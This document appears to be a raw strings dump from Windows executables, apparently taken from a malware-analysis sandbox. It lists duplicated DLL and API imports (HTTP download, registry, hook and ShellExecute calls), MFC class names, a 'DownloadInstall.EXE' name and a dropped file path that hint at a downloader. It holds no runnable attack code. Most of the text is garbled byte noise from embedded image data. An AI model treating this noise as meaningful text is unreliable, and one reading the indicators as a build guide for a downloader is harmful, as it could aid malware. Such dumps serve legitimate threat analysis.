CHttpConnection
CHttpConnection
CHttpFile
CHttpFile
hXXp://
hXXp://
WININET.DLL
WININET.DLL
HTTP/1.0
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
ntdll.dll
%s%s.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
mfcm90.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
user32.dll
ole32.dll
ole32.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
F%D,3
F%D,3
OLEACC.dll
OLEACC.dll
SHLWAPI.dll
SHLWAPI.dll
WSOCK32.dll
WSOCK32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
OLEAUT32.dll
OLEAUT32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
UrlUnescapeA
UrlUnescapeA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
InternetOpenUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCObject@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
zcÁ
zcÁ
00000000000000000001
00000000000000000001
%Program Files%\MM-liao8398.exe
%Program Files%\MM-liao8398.exe
`R.qB
`R.qB
h/y%DlRZ
h/y%DlRZ
J!Ç
J!Ç
yR^y.%U3
yR^y.%U3
/.Ro}!
/.Ro}!
p)%sQ
p)%sQ
CZ%SY
CZ%SY
.vyOx
.vyOx
.Pm[
.Pm[
42a%u
42a%u
O%fWU
O%fWU
%cPqt
%cPqt
F2/%c
F2/%c
C7%SQ5
C7%SQ5
XU%fR
XU%fR
QN.Ui
QN.Ui
IßD
IßD
(Bô|
(Bô|
.Qsty
.Qsty
.bYV`
.bYV`
40%sS
40%sS
%%co\s
%%co\s
P.WGD
P.WGD
2Um
2Um
%U2b&0
%U2b&0
%se7sQ
%se7sQ
[Q.QN]
[Q.QN]
4g%x=XL$5
4g%x=XL$5
.Bsw&wf
.Bsw&wf
uÿQ
uÿQ
R#.oR
R#.oR
45.sSC
45.sSC
OBW2%S2%S2
OBW2%S2%S2
u\%Cr@
u\%Cr@
.Pd4{
.Pd4{
[K.On
[K.On
W.eQYT
W.eQYT
gB7%U
gB7%U
9~ui.QBv@
9~ui.QBv@
J.pEu
J.pEu
\.MdB
\.MdB
accKeyboardShortcut
accKeyboardShortcut
mscoree.dll
mscoree.dll
ekernel32.dll
ekernel32.dll
KERNEL32.DLL
KERNEL32.DLL
DownloadInstall.Document
DownloadInstall.Document
(*.*)
(*.*)
Output.prn$
Output.prn$
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
1, 0, 0, 1
1, 0, 0, 1
DownloadInstall.EXE
DownloadInstall.EXE
dts.exe_1940:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
8%u3P
8%u3P
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
kernel32.dll
kernel32.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
RegDeleteKeyExW
RegDeleteKeyExW
E:\37WanWork\delphicode\vcLander\dts_channel\04
E:\37WanWork\delphicode\vcLander\dts_channel\04
\Bin\lander.pdb
\Bin\lander.pdb
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyW
RegCreateKeyW
RegDeleteKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
MSIMG32.dll
MSIMG32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
FindFirstUrlCacheEntryW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindNextUrlCacheEntryW
FindCloseUrlCache
FindCloseUrlCache
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
zcÁ
zcÁ
.?AV?$CEventHandler@VCFormGame@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CEventHandler@VCFormGame@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormGame@@P81@AEXIIJ@Z@@
.?AV?$CCWebNotifyEventHandler@VCFormGame@@P81@AEXIIJ@Z@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$CFEvent@VCCWebNotifyEventHandler@@VFCWebNotifyEventHandler@@VICWebNotifyEventHandler@@@@
.?AV?$CFEvent@VCCWebNotifyEventHandler@@VFCWebNotifyEventHandler@@VICWebNotifyEventHandler@@@@
.?AVCWebNotify@@
.?AVCWebNotify@@
.?AVICWebNotifyEventHandler@@
.?AVICWebNotifyEventHandler@@
.?AV?$CEventHandler@VCFormLogin@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CEventHandler@VCFormLogin@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormLogin@@P81@AEXIIJ@Z@@
.?AV?$CCWebNotifyEventHandler@VCFormLogin@@P81@AEXIIJ@Z@@
.?AVCFormLogin@@
.?AVCFormLogin@@
.?AVCSQLabel@@
.?AVCSQLabel@@
"iTXtXML:com.adobe.xmp
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> Y
" id="W5M0MpCehiHzreSzNTczkc9d"?> Y
h-IjkJ}
h-IjkJ}
]k%UI
]k%UI
*RpSshd
*RpSshd
0v%S#
0v%S#
H@..ln
H@..ln
.GtB!
.GtB!
9%Up>~
9%Up>~
GY3@%x3
GY3@%x3
-.GcU*Q
-.GcU*Q
{u.YkdE
{u.YkdE
48c.lx
48c.lx
a,.Vx
a,.Vx
###,,,01/222///*)
###,,,01/222///*)
///444*)
///444*)
,- 777---
,- 777---
"&" /'3=%4=
"&" /'3=%4=
&({{{102
&({{{102
$$$/-- *,-((($&&444
$$$/-- *,-((($&&444
-(%dXTcTRdTU]SSRJJVJJNBB
-(%dXTcTRdTU]SSRJJVJJNBB
$""1//)
$""1//)
%/$*/&6
%/$*/&6
':!##.-/
':!##.-/
(4" 8'4E&6F *;"*AMZ
(4" 8'4E&6F *;"*AMZ
...rrredfVUW>>>'&(
...rrredfVUW>>>'&(
3./?8=:6540/
3./?8=:6540/
'"!/'(/)*('#"
'"!/'(/)*('#"
*-2 --')*'&*$' '&($' $()$()$()$()$()%)*')*&()$()$()$()$()$()$' &' %&*%% '&*&' %% '&*(,-*-2
*-2 --')*'&*$' '&($' $()$()$()$()$()%)*')*&()$()$()$()$()$()$' &' %&*%% '&*&' %% '&*(,-*-2
K#3a$2b$4b$4b$4c#3b
/0*./'(,#'(&' $' &' #( $()$()$()$()$()$()&()&()$()$()$()$()$()$' &' &' &&,%'('&($()) , .2
$2b#3a#3a$5`$4c$4b#3a$4b#4_#3a%5`!3bADLADH8=@ /4,/3 03 .3 /4,/4,/4,/4,/4,/4,/4,/4,/4 .3 .3,/4,/4-05-05.16.16-04/26 .6/275:=>CF&/# 2#&." /'.$*/!)0!*.(,"(/!)0'. (/"*1!)0!)0'."(-#)0"(- )2'0!*. *1(/#)0 &&- )- %.&/# 2!(1 )-!(&,3 ),(. (/!',( *1%.7# 2%.SgU(%CV)J]1Um,Pb5_v(0'-4%.2"%.Vih&- 3"(3"*.Udi.Ud4cxs!$%CTG|%DS0Sg1Sj/Ug/Th1Th.Sg$EU&* (/%.7'4$.5$-6%.Tf.Sg-Ug3Tg.Tf/Th.AI&?I03*3=&15)3:&/8%.7#/'-8)5;(.;!)0#,6%.7#''09(/8%".4*4>&3;,2=&07%/6!,49 48*3)2;&/8)2;*4>&19" $%/*)3('1$%/ ",
YdWpz:P[-9E%/9#/9 7C4DPJeoUlt$8C
#?%/.Fg%:a.Bt;[-.2,/-&()%&*#&*(')$()$()$()$()$()$()%)*')*&()$()$()$()$()$()$' &' %&*%% '&*&' %% '&*(,-*-2$3a#3a#3b#3a$4b$4c$4b#3a'4b#1a#3a!2]!2]"3^"2`!4a$4b$4c/0*./'(,#'(&' $' &' #( $()$()$()$()$()$()&()&()$()$()$()$()$()$' &' &' &' $()%&*&' *,-,-1$2b#3a#3a$4b?EL@EH7 /4 .2,/3--3,/4,/4,/4,/4,/4,/4,/4,/4,/4 .3,/4,/4,/4-05-05.16.16,12-04,05.1659>;AF.2,/-&()%&*#&*'&($()$()$()$()$()$()%)*%)*$()$()$()$()$()$' $' $' $' %% '&*&' %% '&*(,-*-2(8g&8g)7g(8f(8g(6f&5f(5a$4b%5`K$4b"5b!3b"5b"5b&5c 6f!8f%6g$8h&7h$8h$8h&8g(,"(- &-&*!'.#(1#).'. (/!',&*!( ")2(/"(/!*.!)0&/ (/#).#)0'. ),"(- (/'0")2 (/'. (/!)0#* &-!*- &-'. &-!*.(, )-#*3"& (/! 2 )2!)0(, (/#,/!*.*,!*."(-#) ,2#(1*2".0#,0!*-'/!-1$,3%.71Th.Tf0Sg1Sj0Ri/Th%-! 2$,3 )3#,#-4$ 4&/# 2".4"ES0Tf/Th,Tg.Ud1Ug1Th%DSO&&19$/7%/6'&6!!/$-#-4",3,4;"*1.7 6>(3;-8@&19&/8&07*4;)3:?NMhr*$$0''3)'3$%/
YdVoy
( "(/#&.
!) & *1
" !%0 /
)0!*.#)."),!'.
'. %."), (/
'.#)0 )-
1 %. &
# (/ )-"(-
"'0")2!*.
.Sg2Rio
1Ug1Sj.TfH{
(/# 2$ 4
!%.Sgh
(/ *1!,0!-3
)3&-6 )-*,6
# $-1")2
",$.5$/7
%1%-4#*3#,5
'%CTs
.Sg0Sg.SgF{
'1".4
1?,Tg-Ug1Ug}
&$0:'09&07
!##1&'5! 0
-"#1(%4 .
$2",3%.7(1:'09 )2'09'09
1@$,3%/6$19.5>$,3(4:
%,&07
!6LW.DP
$$19'09&/8&/8*3.2*6'0:*3(2'4")(4:*6$19$/7!,"".*(4)(2&%/ ",&- )- (/ ),' !&/"(-'.!',!$,(/#)0!)0 (/"(- *1(, (/#)."(-(/ (/!*3 ),'.!)0 (/#(1 )- &-(, '0 &-!'.(/ %. )-&* (/ )-*.#,0")2!)0'0 '0" /.Sg/Ug0Sg2Sg-Uhi-b}#:P","(/"*1# 2"(/)0".2!*3#(%DSa)1 )2 $)% #.6 &"," /" 4'0&,9&/3.SgAp$#/5'.7&281Sj.Tf.Tf0Tf#/!)0&07'18$,3$!.6)4MPOhr#$. *4&'1$%/!#-&- & '0*. )- &-%)!&/!,0"(/!(1!)0!*.' (/!*.!*.)-"(- &-)0 )-"*1'.!'.!*.&- &-!'.&-$*1$)2(, (/ '0##DS.Sgx! 5$-1!*.%-# 2"*1&0$-7'.7'0 /$)23Tg/Ve/Tj1Th.Sg/Scn# !,4!'.Uh2Sf-Rf/Ug.Tf*Tg.Vi0SgQ.Tf1Ug0Tf?o5'.7&07 (/#" 4 .4&07%.)4!"CV0Tf0Tf.Tf.Tf.Tf.Tf0Tf/Ve%CT&-")2)3:)5?'.7##/'*2&)1$%/!( (/ (/&-!)0 (/ (/")!)0# 2&-!)0!)0$ (/!)0# 2'."*1!)0"*1!)0!)0'. (/!)0 (/'. (/ (/"*1 (/%, (/ (/'.!)0 (/'."*1 (/&-!)0 (/!)0'. (/!)0 (/!)0'."*1"*1'. (/ (/!)0 (/&-!)0!)0!)0 (/ (/!)0%,"*1 (/'."*1 (/!)0(/!)0"*1'. (/ (/%,!)0 (/# 2"*1!)0'.# 2 (/ (/'.# 2!)0 (/%-4 (/ (/# 2'.%-4 (/!)0 (/"*1 (/# 2"*1&- (/!)0"*1$,3!)0 (/"*1'.!)0 (/ (/"*1# 2%,# 2!)0 (/ (/ (/'. (/$,3!)0%,!)0$,3 (/ (/ (/"*1!)0&-!)0# 2 (/'. (/!)0!)0!)0 (/!)0 (/'.!)0!)0%, (/!)0"*1 (/"*1!)0$,3&- (/!)0%,$,3"*1"*1$ !)0 (/&-"*1"*1 (/ (/$,3 (/&-!)0!)0"*1'. (/# 2"*1&- (/$,3"*1'.!)0"*1# 2!)0$,3 (/# 2 (/"*1"*1%-4"*1 (/!)0 (/!)0"*1"*1$,3$,3'."*1 (/%-4"*1 (/# 2# 2"*1 (/'.# 2$,3&-# 2# 2# 2'. (/$,3 (/# 2%-4"*1!)0# 2# 2 (/ (/"*1# 2# 2(07# 2$,3$,3%-4# 2"*1"*1$,3# 2"*1%-4# 2&-$,3!)0$,3# 2!)0$,3 (/$,3 (/"*1# 2$,3'. (/# 2"*1%-4'.&.5'/6$,3"*1# 2$,3%.7'.%-4 (/"*1# 2%-4 (/'.# 2# 2$,3 (/!)0$.5#-4#-4",3#-4#-4%/6%/6 (/&.5$,3!)0%-4"*1# 2'/6 (/&.5'.&.5$,3"*1$,3 (/# 2'/6!)0'.%-4$,3"*1'/6&.5 (/&.5#,5(/#-4%/6",3)./,./%)*"%)$' &' $',&()&' $' $' $' $' $' $' &' &' '(,$()$' $' $' $' $' &()$' #&*"'** /(-.,A~-C}0[!0^ 1\/0-,0(* $%)&' &()$' %&*$()$()$()$()$()$()&()&()$()$()$()$' $' $' &' &' $' (' $&'$',*,- /0-C}-BC}.B| A{)?y(@v&;r$7p#8l 7o%;o#8l$8o#7p$9m&7p%9r*>x*?|-A{-C}/C}-C}-C}-C}0[ 0^ 1\ 0[&-"'0 )-(,!', (/'. &-$*1@R*Vg/br*Yg(Yg.cp-^n!I[(,$*1 &&- &- )-!2 DT.br&/% 0!',(2"*1!('. &-!*-"(/'. )- )-"*1(/#*-"(/ *1(, ),"(/'.&,3!)0#*3!)0(0!*.$)2 '0%4 3%.7#,01$.5&-6*2"(3 *1&*"(/&/8,4$-7%-4'%9 )#3#08)3=%/9&4:&/8(/8)6$06)4!*-#,5'.7#('0:%.7#!/5)4",3&19)5;)3=(4:)5?)2;&/8)2;*4>)18 0#/A*.AOMaxsB^i#)N;*/0 -.&* #&*$()%'($',&()&' $' $' $' $' $' $' &' &' '(,$()$' $' $' $' $' &()$' #&*"'** /(-.,B|-C}-C}.B|,B|-@})?y);v&;o 5h.B|,B|.B|-C}-C}-C}0[ 1\ /]/0-,0(* $%)&' &()$' %&*$()$()$()$()$()$()&()&()$()$()$()$' $' $' &' &' $' &()#&*#&** / /0.A~-C}.B|.B|/C},A~,A~-B-C}-C},A~.A~-B/^ 0_ 0_/^ 0_ /`AFI@CG8;? /4 03*/2,12 .2,/3,/3,/3,/3,/3,/3,/3,/3 .2,/3,/3,/3-04-04.15.15.16-25,/711759:=BE-.2 0.&()%% "'**((#&*$()$()$()$()$()$()'))&(($)($)($()$()$()&' %&*%&*%$-'% &(($#,(' (,-),0-C}*=z%9p"6m 1i/^ 0_ .^!(#)0# 2'.!'."&&-"(/ (/!'.'- &-#)0&/ &- '*ET.bs%* (/$(3!'. *1&(!'."*1!)0!)0!*.!*. ), (/'.!', (/)- )-"*1"(-$ (/ )-#(1*.!(1!(%. )- #'."(-!*4&*!', (/"(-'!)0# 2! 2!)0%,!',#,5!(1 )- (/(, (/&,1(/"*1!*.'0!*4 )2 & ! 2&2!-3%.2!*3 (/~^(4"*1 ),'-4*3!-3",3&-6)5! 2",3!*3(4#-4&19$ 4*5! 5",3%D`q@_n$2$19&/8$-6)5$.5! 2*4;# 2#2#1= 6>(3;-8@&19&/8%/6*4;)3:*,!',%*3&- (/ (/?Q%Vf.do(Yg'[g-aq _l K\&* & (/))!'.#).&/ (/"*1!)0'.!*.!',)-!(1 (/&/!'. )-)-! 2 ,.#/!,4 (/!*.#(1 )2)/ *1$*1)0%,5%*34"*1 $)'5$.8!',)4! 2" /)5"/7'-8$2!18%.7#17)6 *1&07*29$,3#* &- �$0:*5=*5=(3;*5=)3: 5&*!'. (/AP(Vg.br'[h&Zg*cr ^n KZ' )-!*.'.! 2 &-(, )2!( " /'.$*/!*.#).(1 &- ),!*. (/(, (/" /$-"(/"(-% 2(,!)0 &-)0!$,!*4"(- (/ (/'0!-3 )- (/(/$)2 /%8S/TvS&2#/5#,5(,! 2 *1(5$-6&-6*7 *1! 2(0".4!'./6%-:'/6 )-)/6#-47'4"''0:&3;5 -5 4=(/8&/8$-6%/6*4;)5;)6>)2;.7@'18'.7%.7)3=)3=" /&-!*3)48)6>%.7!09)3!(1" /!(1#)0' ),!)0!'.#',&/!'.!*.!((,! 2 )-%, (/"(/)-!)0 *1&* & %.%.!(1 &-'.!'.!*. $)"(/ 3!*.$0!*4" //.Tv3_)Ec%C`4a%1!(1" 5)1! 2".0,4 )-")2$*1"-18$-7 )-#.6)1! 2" /5Nb.CX'4'-8*5#/5$)2".27$.5".2%0%1;'0:$06,8#-4%.7(1:'09 )2'09(1:%,&07$19#1'3='09&/8&/8*3#"-5'3=&/9'18)5;'4(/)5;)5;!((4:*6$192>84DT.IJHEGG'45CV3B\.Ad5EV8JK1'4*-,.IDA}ru%%%., .,,., &(((&&244---333555222)(*,)%dXTaTRbTU]SSPKJVJJNBB-.CAABBB031
34CFD"
]^\8;?*- 673[_`
3-.?9::56510
@;755524/* ,*) '&)''"!#&%')$%$"!&"!(((533-*, &(- -)(0 *)$%#"$&%' '&(%!%%f6644*'),').) ("#)#$'#"&$#-(' ##)%$$""!977,,,!&'2006120 ,3.-/*) &'%"$!$!# &',(')$#*%$)%$!.*))''.,,1-,,'&2,-2-,&$#&$$$$(')$""$($# ))%## &%'"!$$$--- ))'%%*%$/*).)(*&%($#%##!'"!.*))$#(#"($#"222888999%%%(#"($#%! *%$'"# '#"&"!'#"$&! ,%"&! &"!&!$$$;;;777755&! *&%%##)$#)%$'"#)#$$444;;;./-4#",./-8)*./.0...*,,0/1)'&###))) %%%111???|||8!"0&)' "#(')142:'-//:88111--- *,...46@;;;;8="/20;;;:56689*%&4$$2/19031''' ######%%%"""(*%$""555879 9!453666,-)));;;7770/1&&&231&%'89786687;:?@>===946;<:333555>"""###$$$'''!)(*342*** !ÌC###555JJJ "#"#!GHFAAA?>@MMM;;;GFHIGGKIIB@@A>@$&&&&&CCCADBAAA.4/???111222!!!#%%$$$---)))///***)))AAACDB )))---UUUPPP>>>'(&RRRWUUMKKTRRKIH)*(---VVVBC?GFHSSS()'IHJCDB&&&(')FGEIKLOOO ,*422:::657,*)'%24333=;;EBD031-,.GEEGGG888>?=CBDFGEDHC*) $""BBBGIJ,,,888III!" 111BBBKKKHIG675%%%'&(===;<:::::::>"""000111nnnUUUqqq___YYY}}}KKKYYYYYYNNN:::\\\ZZZ:::bbb333888ddd222aaa^^^[[[XXXBBBTTTRRRJJJLLLWWWfffmmm...\\\___GGG///---444222111ccc```bbbYYY___...VVVZZZ...@@@LLLRRREEEOOOWWWYYYJJJUUUEEEKKKHHHNNN???777444III>>>CCC''' 555---888***$$$///)))!!!***:61'(&006)*.015&&&222./-) 3..4015---;;;777/19#$(1341178:;/11...QQQJJJ&&&...FFFFFF51,333[[[[[[(((###!!!"""***%%%###%"$'#%%#%%'$&)*$"&%'%&$%$&$$$$$$!!!,,,%%%"""!!!$$$,,,''')))333311$%#.)*1///---0.%##000----0.''',..*) $&&586',!!!,,,&&&---$$$%%%...333***((($$$!$"746435---222444435754&&&!"- ''3-134540333%&"79:=:"!#=;:>9;$)(1,**435968594:>?>20/$&&###)))---###111...888 ...000***$$$"""###888777>>>%##122>--;"! 4449:87$&1'&('(&666897#%"2!!! :::???777!"6;:;99'&( !999 (')>?=13376@...999555;;;888???435$""0/27#"$%''977 #1.00>"#! !%$""!!!(((,**???;;;===666;;;"""%%ÌC===III675>000,(-!" 333*(';;; '$&===635>444>>>$#%$$$;=>?>@9:89:8(')555%&$KJLCCCEEEOOO895%&$#"$ ,*(%'$#ÝD%%%'%$"""$!#!$"=NNN111142HJJGFH!!"#!NKMLJJLLL;==?@>GEE%%%LLLFDCEEE-,.JHHJKI* )$$$$%#%$&444$$$(&&!" 768FFF&'%"""CBD453444NNNHHHCCCCCC???000777:::666>>>GGGOOOVVV---///SSSYYYIII???SSSMMM444***NNNIII///111555,,,...XXX[[[VVVVVVXXX444YYYZZZOOOaaaVVVHHH>>TTTRRREEE000VVV---LLLYYYRRROOORRR YYYSSSQQQNNN???...ZZZ111000NNNfffFFFHHHNNNNNNSSSNNNSSS:::LLL^^^HHHVVV333---XXXVVVWWW[[[ddd===@@@OOOHHHQQQ111OOOlllZZZUUUEEE^^^fffaaaUUU]]]aaaaaaSSSaaaccc]]]ZZZIII;;;555XXXfff444dddWWWbbb^^^AAA///...222555999XXXiii...QQQbbbNNN>>>NNNXXXFFFAAA]]]]]]sss]]]:::eee...QQQYYYTTT```FFFHHHLLLCCCWWWHHHFFFOOOIIIOOO???>>>===???666222222222222,,,###---///***999---666===:::AAA:::999===GGGIIIDDD@@@SSSIIIWWWQQQSSSUUUMMMPPPOOOPPPQQQTTTVVVUUUYYYTTTTTTXXXPPPSSSHHHMMMLLLMMMJJJNNNPPPIIINNNKKKUUUUUUOOOFFFHHHAAAXXX^^^RRRRRRFFFLLLFFFHHHOOOSSSYYYVVVaaa"""???:::%%ÝD===***"""!!!'(##""")))!!!---,,,///"""111---!000( )$$$222333)))((( $$$ ###%%%,,,###"""@@@&&&,,,777111)*(879%%%***...(((***)))111000)))666%%%&&&---(((5324120. -444777###$$$))) 333...%%%###---''',,,5977777777)'&/6669;;546 #!&&&4445554442225"#7022'(6"(*4- 7* 5342?=666768***///:::444666"""222888(((%%%***777000###!!!$$$"""9;;-.,<:9>(* >=?>=?8#$2777444888;;;444(((>>>777888###"""%%%***///... 999...111###...)))$$$:9;:=;=??253111;99&((777688>=?;466(&&!!!'&(999===???%%%666???::: !!!"""$$$((())) $$$%''' !!!# "$#"!#673>:?310:###444???999:::111(((999879?>@???#"$$$$?=755>>>55598:!!)))01/3648:;555!!!>>,,,,,,?BBB *, *.DEC215:!!!'''=?@546(&&@@@(&&673HIG%&*&((453<::>>'(&244>>>444ACC ""$&&GGG76:! "%$&$#V4%%%$$$%%%***IHJKJL---EFDDBAMMM%&"DCE???>>######"""$$$%%ÌC$$$&&&,,,"""#%&888NNNEFDDCEKKK%%%!!!HHHIII 666FFF;;;888&&&===...444DDD??? 666666 ...999999333555000...999444@@@RRRNNNNMO\]YRTUTTTACC')*;<:pnn555www>>>QQQFFFIII,,,&&&%%%...DDDNNN222...>>>999...,,,333666222666@@@444555:::JJJJIKEEEEEE```TTTXXXRRR...fff777\\\sss^^^]]]@@@FFFXXXNNN>>>NNNbbbSSS,,,jjjWWW:::444333...///AAA^^^cccWWWddd444fffWWW444;;;IIIZZZ^^^bbbaaaTTT```bbb]]]TTTaaaeee^^^GGGTTTZZZlllOOO000RRRGGGOOO@@@===ddd[[[WWWVVVXXX,,,444UUUHHH^^^LLL;;;QQQOOOTTTNNNMMMHHHFFFgggoookkkuuuJJJDDD!! """$$#%%" $)*%* $()(,-!##'))"$$%*)*,-%)*', */.& *.01)-.(-,$)(*/.022,..-/0' ,(**#%%"$$ """%#(**$&& "#(* ,10#('&* ,/3%*) %$!%&& *#""$$!##" ""&()#'(#%% %$#%%!#$&(( 0/59>& *,9;:?@$:.66 '$" '($(')222???~~~$$$%%%""".-/PRRQTR --%''%''5788::#%&-/0JGI/ *(%'&$$MKJ>---)))000 )))0..JJJ@BB>q!@s$Cx%Dy$By$By#Ax!B%Cz'Cy-IJj.Qs1!4O%C!!!###%%!#$#&$$'%'))) !##),*$)'$)(#('(,-$#$)'(- (,-(,-*./*/.054.32165', -21).-"$$$)((,-"&')-.' ,$)(#('!&%#(&*/#'(!"$)*.23.23,01/34 /0/43,10!&%#%%'4).7#)(%*($&'#%&"*0/$*).00,216;:*59)./%$&& *%''$)**./.32.OZ^9IV#*;8=>065& * 0/.00*./-/0389!09&4,01#%%"'&07>;&)-%*("!#!7$&&'''#!!4%* %$ %$34 #!$$$)))%%%###"$%222 ))022@@@5;:&&&===???FHI.23:?B4BUGUhZh{]m}!%f...999777>>>444$$$ 